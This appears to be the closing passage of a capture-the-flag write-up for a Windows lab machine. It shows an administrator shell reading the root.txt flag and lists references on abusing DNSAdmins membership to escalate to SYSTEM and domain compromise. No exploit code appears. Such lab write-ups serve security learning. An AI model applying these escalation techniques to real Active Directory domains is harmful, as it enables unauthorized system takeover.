dir
Volume in drive C has no label.
Volume Serial Number is 923F-3611
Directory of C:\Users\Administrator\Desktop
12/04/2019 06:18 AM <DIR> .
12/04/2019 06:18 AM <DIR> ..
12/03/2019 08:32 AM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 30,837,903,360 bytes free
C:\Users\Administrator\Desktop>Get-Content "root.txt" | Measure-Object -Character -Word
Get-Content "root.txt" | Measure-Object -Character -Word
'Get-Content' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\Administrator\Desktop>powershell
powershell
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Users\Administrator\Desktop> Get-Content "root.txt" | Measure-Object -Character -Word
Get-Content "root.txt" | Measure-Object -Character -Word
Lines Words Characters Property
----- ----- ---------- --------
1 32
PS C:\Users\Administrator\Desktop>
|
If you liked my writeup please leave a respect on my Profile
Referrences:
Abusing DNSAdmins privilege for escalation in Active Directory
From DnsAdmins to SYSTEM to Domain Compromise
Transferring Files from Linux to Windows (post-exploitation)